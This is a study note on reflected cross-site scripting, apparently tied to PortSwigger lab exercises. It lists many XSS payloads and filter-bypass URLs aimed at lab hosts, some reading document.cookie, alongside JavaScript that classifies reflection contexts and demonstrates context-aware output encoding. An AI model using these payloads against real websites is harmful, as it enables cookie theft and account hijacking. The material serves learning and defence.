Reflected XSS
What is it?
Reflected XSS executes JavaScript because an input value is reflected, unencoded, into the page.
For example:
https://insecure-website.com/search?term=gift
is reflected as:
<p>You searched for: gift</p>
Then
https://insecure-website.com/search?term=<script>alert('XSS')</script>
will probably be reflected as:
<p>You searched for: <script>alert('XSS')</script></p>
popping an alert with XSS as its contents.
How to find it?
Use these steps to find it (the Burp Suite scanner should also warn):
- Test every endpoint
  - all parameters in the URL query string
  - all parameters in the message body
  - the URL file path
  - HTTP headers
- Submit a random alpha value
- Check whether the value is reflected
- Determine the reflection context
  - Is it in the page body (a text node)?
  - Is it in a tag attribute?
  - Is it in JavaScript?
  - Is it in CSS?
- Test a candidate payload
- Test alternative payloads
  - use closing quotes when needed
  - use a bypass when needed
- Test the attack in a browser
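The "check if the value is reflected" and "determine the reflection context" steps above can be scripted. The following is an added example written for this note (it is not code from the PortSwigger labs or from Burp Suite): given a response body and the random canary that was submitted, it reports every offset where the canary is reflected and which context it landed in. The canary value and the response snippets in SAMPLES are constructed for the example.

```javascript
// Added example: locate a reflected canary in an HTML response and classify
// its context (text node, attribute, script, style, comment).
// Not from the PortSwigger labs or Burp Suite; inputs below are constructed.

const CANARY = "zq7kq2vb"; // random alpha value that was submitted (assumption)

// Classify the context at position `pos` in `html`.
function classifyContext(html, pos) {
  const lower = html.toLowerCase();

  // Raw-text elements: the canary is JavaScript or CSS, not HTML markup.
  for (const tag of ["script", "style"]) {
    const open = lower.lastIndexOf("<" + tag, pos);
    if (open !== -1) {
      const close = lower.indexOf("</" + tag, open);
      if (close === -1 || close > pos) return tag;
    }
  }

  // HTML comment.
  const cOpen = html.lastIndexOf("<!--", pos);
  if (cOpen !== -1) {
    const cClose = html.indexOf("-->", cOpen);
    if (cClose === -1 || cClose > pos) return "comment";
  }

  // An unclosed '<' before the canary means we are inside a tag: attribute context.
  const lt = html.lastIndexOf("<", pos);
  const gt = html.lastIndexOf(">", pos);
  if (lt > gt) {
    const between = html.slice(lt, pos);
    const dq = (between.match(/"/g) || []).length;
    const sq = (between.match(/'/g) || []).length;
    if (dq % 2 === 1) return "attribute (double-quoted)";
    if (sq % 2 === 1) return "attribute (single-quoted)";
    return "attribute (unquoted)";
  }

  return "text";
}

// Every reflection of the canary with its offset and context.
function findReflections(html, canary = CANARY) {
  const hits = [];
  let pos = html.indexOf(canary);
  while (pos !== -1) {
    hits.push({ offset: pos, context: classifyContext(html, pos) });
    pos = html.indexOf(canary, pos + canary.length);
  }
  return hits;
}

// Constructed response fragments, one per context the steps above list.
const SAMPLES = {
  text: "<p>You searched for: zq7kq2vb</p>",
  attrDq: '<input type="text" name="term" value="zq7kq2vb">',
  attrSq: "<a href='/search?term=zq7kq2vb'>again</a>",
  attrUnq: "<div data-term=zq7kq2vb></div>",
  script: "<script>var input = 'zq7kq2vb';</script>",
  style: "<style>.hl::after { content: 'zq7kq2vb'; }</style>",
  comment: "<!-- last term: zq7kq2vb -->",
  twice: '<p>zq7kq2vb</p><input value="zq7kq2vb">',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, findReflections(html));
}
```

The context decides which payload family applies next (closing quote for attributes, closing tag or string break-out for script blocks), and on the defensive side it is exactly the information an output encoder needs: a single "encode everything the same way" filter is what the later sections of this note bypass.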
Attacks on tags
WAF bypass steps
- Copy all tags from the XSS cheat sheet
- Use Burp Intruder to send them into the reflecting field
- Note which ones pass
- Repeat for all events
- Note which ones pass
- Create an exploit on the exploit server
Example where the body tag and the onresize event are allowed:
<iframe src="https://your-lab-id.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
Deliver to victim
Custom attributes
<script>
location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>
Deliver to victim
All events and href blocked
https://your-lab-id.web-security-academy.net/?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E
Reflected in SVG
Use the same approach as the WAF bypass, but with SVG tags:
https://your-lab-id.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E
Deliver to victim
Angle brackets <> HTML encoded:
When this does not work because <> is not allowed:
"><script>alert(document.domain)</script>
try this:
" autofocus onfocus=alert(document.domain) x="
effectively inserting an event handler attribute on the existing tag, because only the angle brackets were encoded and the double quote was not.
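The fix for that case is context-aware output encoding: a text node needs `& < >` encoded, an attribute value also needs both quote characters encoded. The block below is an added example written for this note (not code from the PortSwigger labs); it renders the same search input with the weak "angle brackets only" filter and with a proper attribute encoder, and uses a small, non-executing attribute tokenizer to show which version lets the quoted payload create extra attributes. The form template and the attribute tokenizer are constructed for the example.

```javascript
// Added example: context-aware HTML output encoding for the text-node and
// attribute contexts, with a check showing why encoding only < and > fails.
// Not from the PortSwigger labs; the template and inputs are constructed.

// Text-node context, e.g. <p>You searched for: ...</p>
function encodeForHtmlText(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;" };
  return s.replace(/[&<>]/g, ch => map[ch]);
}

// Attribute context, e.g. <input value="...">: quotes must be encoded as well.
function encodeForHtmlAttribute(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, ch => map[ch]);
}

// The weak filter from the "angle brackets HTML encoded" case: < and > only.
function encodeAnglesOnly(s) {
  return s.replace(/[<>]/g, ch => (ch === "<" ? "&lt;" : "&gt;"));
}

// The search form echoing the term back into an attribute value.
function renderInput(term, encoder) {
  return '<input type="text" name="term" value="' + encoder(term) + '">';
}

// Attribute names of the first tag in `html`, tokenized the way a browser
// does: a quoted value runs to the matching quote, an unquoted value to the
// next whitespace or '>'. Any name beyond type/name/value means the term
// broke out of the value attribute.
function attributeNames(html) {
  const tag = html.match(/<[A-Za-z][^>]*>/)[0];
  const re = /\s+([^\s=\/>"']+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  return [...tag.matchAll(re)].map(m => m[1]);
}

const TERM_TEXT = "<script>alert('XSS')</script>";                   // payload quoted in this note
const TERM_ATTR = '" autofocus onfocus=alert(document.domain) x="';  // payload quoted in this note

function demo() {
  return {
    text: encodeForHtmlText(TERM_TEXT),
    weak: attributeNames(renderInput(TERM_ATTR, encodeAnglesOnly)),
    fixed: attributeNames(renderInput(TERM_ATTR, encodeForHtmlAttribute)),
  };
}

console.log(demo());
```

With the weak filter the tokenizer reports `autofocus`, `onfocus` and `x` as attributes of the input element; with the attribute encoder it reports only `type`, `name` and `value`, because the quote that would have ended the value is now `&quot;`.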
Setting an access key
Using
https://your-lab-id.web-security-academy.net/?%27accesskey=%27x%27onclick=%27alert(1)
The access key ALT-X is set. Just trigger the victim to use it ;)
Attacks on JavaScript
When the input lands inside a script block we have to take control of the JavaScript, for example:
<script>
...
var input = 'controllable data here';
...
</script>
We can insert
</script><img src=1 onerror=alert(document.domain)>
This closes the script block and uses the img tag's error event to trigger XSS.
Single and double quotes escaped
use
</script><script>alert(1)</script>
which uses neither single nor double quotes.
Encoded angle brackets <>
use
'-alert(1)-'
to break out, or
'-alert(document.domain)-'
';alert(document.domain)//
to break out of string literals.
Other
If
';alert(document.domain)//
is converted to
\';alert(document.domain)//
use this alternative payload
\';alert(document.domain)//
to get it converted to:
\\';alert(document.domain)//
The way to test:
- Submit random alpha string
- Check response
- Try test'test and observe
- Try test\test and observe
- Try test"test and observe
With an escaped single quote, and encoded double quote and angle brackets:
\'-alert(1)//
Globally assign an error handler and throw an error
onerror=alert;throw 1
This causes alert to be called with '1'.
Deliver using
https://your-lab-id.web-security-academy.net/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27
JavaScript template literals
Imagine having
document.getElementById('message').innerText = `Welcome, ${user.displayName}.`;
and an XSS context such as
<script>
...
var input = `controllable data here`;
...
</script>
the payload can be:
${alert(document.domain)}
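All of the script-context cases in this section (closing the script block, breaking out of a single-quoted string, the `\'` variant that defeats a quote-only escape, and the `${...}` substitution in a template literal) are neutralised by the same defensive rule: when placing data inside a JavaScript string literal, encode every character that is not alphanumeric as a `\uXXXX` escape. The block below is an added example written for this note (not code from the PortSwigger labs): it compares that encoder with the weak quote-only escape the lab uses, using a small, non-executing scanner that walks the string literal the way a JavaScript lexer would. The `renderScript` template and the oracle functions are constructed for the example; the payload strings are the ones quoted in this note.

```javascript
// Added example: output encoding for data placed in a JavaScript string
// literal, checked against the payloads from this note without executing
// any of them. Not from the PortSwigger labs; template and oracles constructed.

// Correct: encode everything that is not [A-Za-z0-9] as a \u escape. The
// escapes are valid in both quoted strings and template literals, and the
// result contains no quote, backslash, '<', '$' or '{' that could break out.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, ch =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Weak: the "escaped single quote" filter, which prefixes ' with a backslash
// and leaves backslashes alone, so \' becomes \\' and the quote is live again.
function weakEscapeQuote(s) {
  return s.replace(/'/g, "\\'");
}

// The vulnerable template from this section, rendered with a chosen encoder.
function renderScript(value, encoder) {
  return "<script>\nvar input = '" + encoder(value) + "';\n</script>";
}

// Oracle 1: scan the single-quoted literal like a lexer (a backslash consumes
// the next character) and report whether it ends exactly where intended.
function literalIntact(encoded) {
  const lit = "'" + encoded + "'";
  let i = 1;
  while (i < lit.length) {
    if (lit[i] === "\\") { i += 2; continue; }
    if (lit[i] === "'") break;
    i++;
  }
  return i === lit.length - 1;
}

// Oracle 2: nothing inside the script element may be able to terminate it.
function scriptIntact(rendered) {
  const body = rendered.slice("<script>".length, rendered.lastIndexOf("</script>"));
  return !body.includes("</");
}

// Payloads quoted in this note, in the order they appear.
const PAYLOADS = [
  "</script><img src=1 onerror=alert(document.domain)>",
  "'-alert(1)-'",
  "';alert(document.domain)//",
  "\\';alert(document.domain)//",   // the backslash-prefixed variant
  "${alert(document.domain)}",
];

// true per payload when both oracles hold for the given encoder.
function evaluate(encoder) {
  return PAYLOADS.map(p =>
    literalIntact(encoder(p)) && scriptIntact(renderScript(p, encoder)));
}

console.log("weak  :", evaluate(weakEscapeQuote));
console.log("fixed :", evaluate(encodeForJsString));
```

The weak escape survives only the two plain quote payloads; it lets `</script>` end the element and lets the `\'` variant turn into `\\'`, an escaped backslash followed by a live quote. The `\uXXXX` encoder passes every case, including the template-literal payload, because `$` and `{` are encoded too. Even so, the safer design is not to interpolate untrusted data into a template literal or an inline script at all, but to pass it through a data attribute or a JSON endpoint that the script reads.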
Angular sandbox escaping
References:
Cheat sheets
- PortSwigger XSS cheat sheet
- OWASP XSS filter evasion cheat sheet